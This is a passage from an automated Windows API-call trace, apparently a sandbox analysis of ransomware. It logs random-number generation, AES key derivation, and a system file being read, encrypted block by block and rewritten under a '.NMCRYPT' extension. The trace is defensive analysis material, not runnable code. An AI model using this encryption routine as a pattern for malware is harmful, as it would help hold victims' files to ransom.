pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.561] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.563] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.564] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.565] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.565] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.566] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0154.566] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.566] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad7b8) returned 1 [0154.566] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0154.566] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0154.566] wcslen (_String="\\\\?\\") returned 0x4 [0154.566] CryptDuplicateKey (in: hKey=0x9ad7b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad4f8) returned 1 [0154.566] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0154.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fi-FI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0154.567] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0154.567] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0154.567] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.569] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.569] GetLastError () returned 0x0 [0154.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.633] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.633] GetLastError () returned 0x0 [0154.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.633] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.633] GetLastError () returned 0x0 [0154.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.633] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.633] GetLastError () returned 0x0 [0154.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.633] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.634] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.634] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.634] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.634] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.634] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.634] GetLastError () returned 0x0 [0154.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.634] ReadFile (in: hFile=0x1624, 